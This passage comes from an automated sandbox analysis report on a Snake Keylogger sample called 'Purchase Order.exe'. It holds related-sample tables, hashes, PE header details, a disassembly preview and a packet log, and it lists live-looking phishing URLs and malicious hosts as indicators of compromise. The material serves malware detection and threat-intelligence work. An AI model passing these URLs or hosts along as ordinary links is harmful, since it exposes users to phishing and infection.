                                                                                                          • 172.67.169.18
                                                                                                          PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.169.18
                                                                                                          us2.smtp.mailhostbox.comcgprgRztWc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.223
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 208.91.199.224
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 208.91.198.143
                                                                                                          Dhl 984857.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.224
                                                                                                          Dhl 0393837.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.224
                                                                                                          109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 208.91.199.225
                                                                                                          SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.225
                                                                                                          6P8VytD7wo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.223
                                                                                                          CV Mariana Alvarez.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.225
                                                                                                          RFQ DM03058 pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 208.91.198.143
                                                                                                          reallyfreegeoip.orgPurchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          PT98765445670009.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          SDTP098766700000.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUShttps://cloudflare-ipfs.com/ipfs/bafkreic3i3fs3k4jlf22yl27nsvzygbmg4qrugkfu2cq65waif525cpbx4#Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 172.67.161.26
                                                                                                          SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                          • 172.67.217.100
                                                                                                          BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.74.5
                                                                                                          https://m.exactag.com/ai.aspx?tc=d9584755bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ahilanddalry.net%2Ftoro%2F05752%2F%2FYmlsbF9iaWViZXJpdHpAdHJla2Jpa2VzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.17.2.184
                                                                                                          Grkradw6vd.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
                                                                                                          https://futurehvacindia.com/HmF/zJqRTbTA3E8NkEdNG3XSYYpT2CPHqoF9DTsq4XxUrAiFitNdJPZxAsKByKFHL2Bbj7EGed34VRP3gvaoT2ErdEZV8ZcoXh7qUKmkmsJiezE9HjtrHmhzSvnLEPpvK6Khe5ctQxfCrvAgAVcoyVijtRGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.21.62.23
                                                                                                          copy#10652203.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog StealerBrowse
                                                                                                          • 172.67.74.152
                                                                                                          http://pepjob.com/jobseekers/tools/valuestest.htmGet hashmaliciousUnknownBrowse
                                                                                                          • 1.1.1.1
                                                                                                          https://lucanew096.trinket.io/sites/html-46b700a5e3hwehwwehtmlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exeGet hashmaliciousGCleaner, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                          • 172.67.74.152
                                                                                                          UTMEMUSPurchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          23343100IM00270839_Dekont1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          9NdabeH642.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 132.240.147.214
                                                                                                          Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          xdd6BRIg0O.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          AMM9Xsyg59.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 128.169.185.82
                                                                                                          Mquqdysqqv.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          PUBLIC-DOMAIN-REGISTRYUShttps://m.exactag.com/ai.aspx?tc=d9584755bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ahilanddalry.net%2Ftoro%2F05752%2F%2FYmlsbF9iaWViZXJpdHpAdHJla2Jpa2VzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 162.222.227.139
                                                                                                          SHIPPING ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 207.174.215.249
                                                                                                          INVOICE_FEB-888201-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.222.226.100
                                                                                                          mGJWUAE5wa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 45.113.122.70
                                                                                                          1NJf6k6HU1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 45.113.122.70
                                                                                                          cgprgRztWc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 208.91.199.223
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 208.91.199.224
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 208.91.198.143
                                                                                                          https://m.exactag.com/ai.aspx?tc=d9985160bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41hilanddalry.net%2Ftoro%2F67328%2F%2FYWxla3NhbmRlckBtaWRsYW5kY29tcHV0ZXJzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 162.222.227.139
                                                                                                          PURCHASE ORDER MSM09897.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 207.174.215.2
                                                                                                          CLOUDFLARENETUShttps://cloudflare-ipfs.com/ipfs/bafkreic3i3fs3k4jlf22yl27nsvzygbmg4qrugkfu2cq65waif525cpbx4#Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 172.67.161.26
                                                                                                          SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                          • 172.67.217.100
                                                                                                          BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.74.5
                                                                                                          https://m.exactag.com/ai.aspx?tc=d9584755bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ahilanddalry.net%2Ftoro%2F05752%2F%2FYmlsbF9iaWViZXJpdHpAdHJla2Jpa2VzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.17.2.184
                                                                                                          Grkradw6vd.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                          • 172.67.139.220
                                                                                                          https://futurehvacindia.com/HmF/zJqRTbTA3E8NkEdNG3XSYYpT2CPHqoF9DTsq4XxUrAiFitNdJPZxAsKByKFHL2Bbj7EGed34VRP3gvaoT2ErdEZV8ZcoXh7qUKmkmsJiezE9HjtrHmhzSvnLEPpvK6Khe5ctQxfCrvAgAVcoyVijtRGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.21.62.23
                                                                                                          copy#10652203.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog StealerBrowse
                                                                                                          • 172.67.74.152
                                                                                                          http://pepjob.com/jobseekers/tools/valuestest.htmGet hashmaliciousUnknownBrowse
                                                                                                          • 1.1.1.1
                                                                                                          https://lucanew096.trinket.io/sites/html-46b700a5e3hwehwwehtmlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exeGet hashmaliciousGCleaner, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                          • 172.67.74.152

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adPurchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          lxdriver_setup.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                          • 104.21.67.152
                                                                                                          iCareFone.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          1d4D5ndo0x.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Quark Browser.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                          • 104.21.67.152
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ecopy#10652203.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog StealerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          SHIPPING ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.21.27.85
                                                                                                          https://held-messages.dariscompany.com/rich.hillyer@dish.com/held-messagesGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.21.27.85
                                                                                                          .scr.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 104.21.27.85
                                                                                                          mGJWUAE5wa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.21.27.85
                                                                                                          1NJf6k6HU1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.21.27.85
                                                                                                          .scr.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 104.21.27.85
                                                                                                          Lpym75Agro.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 104.21.27.85
                                                                                                          cryptedMYLEL.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 104.21.27.85
                                                                                                          qe6SYl5IZC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.21.27.85

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):7.94127509116759
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          File name:Purchase Order.exe
                                                                                                          File size:529'920 bytes
                                                                                                          MD5:b9f9c9cac777dca7a78819914da1ba15
                                                                                                          SHA1:2369adcf893a14e6b8351edeeb2b6b63147fd157
                                                                                                          SHA256:32aeea1990475960922b9a0bbda5a7edc864a3c70e4b8c5e84b16e269ea6fc7c
                                                                                                          SHA512:987ce8faf0a50e3ee2e68a5f8412c63c6ff02209f696abf9ebc3e130b4f3916ec8f58e1c3655d6fdc50675d1eab2909089f021885ab440bba6d05ea7f609d7a4
                                                                                                          SSDEEP:12288:GWkE8HrebvPyMjBeIlWeR17RiQ2BPHzrl5UH:GZqzPyKBZWeR1v2BPHduH
                                                                                                          TLSH:35B413033BADCB11C3BD5BBA6972453943F2A69A3BF2E34C5F9470D511213809AA5F63
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U.................0............."*... ...@....@.. ....................................@................................

                                                                                                          File Icon

                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x482a22
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0xB2AFCB55 [Tue Dec 30 12:21:41 2064 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          xor al, 38h
                                                                                                          xor eax, 38483446h
                                                                                                          xor al, 47h
                                                                                                          dec eax
                                                                                                          xor eax, 00003447h
                                                                                                          add byte ptr [edx], dh
                                                                                                          inc ebx
                                                                                                          inc edx
                                                                                                          push ebx
                                                                                                          aaa
                                                                                                          dec eax
                                                                                                          xor eax, 00003439h
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x829cf0x4f.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x5b4.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x808a40x70.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000x80a480x80c009c2c852aae9e1187bdc1506907ea47b3False0.9498919144417476data7.9495035633914695IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x840000x5b40x6001fbc81ad3e46fba8e249c228192eb2d3False0.4225260416666667data4.101412678347177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x860000xc0x200954b89a0f3cf94bca47e7e7c8f211a3bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_VERSION0x840900x324data0.43283582089552236
                                                                                                          RT_MANIFEST0x843c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Apr 4, 2024 16:34:10.244363070 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:10.476181030 CEST8049735132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:10.476298094 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:10.476751089 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:10.708553076 CEST8049735132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:10.709006071 CEST8049735132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:10.713816881 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:10.952943087 CEST8049735132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.004995108 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:11.124512911 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.124547958 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.124622107 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.138036966 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.138051033 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.403080940 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.403198957 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.408139944 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.408154011 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.408451080 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.457400084 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.504235029 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.698847055 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.698961020 CEST44349736104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.699012041 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.704919100 CEST49736443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.708281040 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:11.960510015 CEST8049735132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.963870049 CEST49737443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.963913918 CEST44349737104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:11.964006901 CEST49737443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.964339972 CEST49737443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:11.964354992 CEST44349737104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:12.004956961 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:12.225429058 CEST44349737104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:12.227214098 CEST49737443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:12.227241993 CEST44349737104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:12.530240059 CEST44349737104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:12.530353069 CEST44349737104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:12.530410051 CEST49737443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:12.530970097 CEST49737443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:12.534581900 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:12.535584927 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:12.989330053 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:13.221160889 CEST8049735132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:13.221221924 CEST4973580192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:13.536277056 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:13.766470909 CEST8049738132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:13.766731024 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:13.766841888 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:13.997174025 CEST8049738132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.001847029 CEST8049738132.226.247.73192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.003317118 CEST49739443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:14.003340960 CEST44349739104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.003411055 CEST49739443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:14.003670931 CEST49739443192.168.2.4104.21.67.152
                                                                                                          Apr 4, 2024 16:34:14.003684998 CEST44349739104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.051851988 CEST4973880192.168.2.4132.226.247.73
                                                                                                          Apr 4, 2024 16:34:14.261440039 CEST44349739104.21.67.152192.168.2.4
                                                                                                          Apr 4, 2024 16:34:14.263144016 CEST49739443192.168.2.4104.21.67.152
